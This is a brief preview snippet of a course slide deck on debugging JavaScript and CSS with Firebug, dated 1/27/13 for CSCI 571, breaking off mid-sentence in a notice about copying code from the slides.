Debugging JavaScript and CSS Using Firebug Harman Goei CSCI 571 1/27/13 Notice for Copying JavaScript Code from these Slides When copying any JavaScript code from these slides, the console might return
More information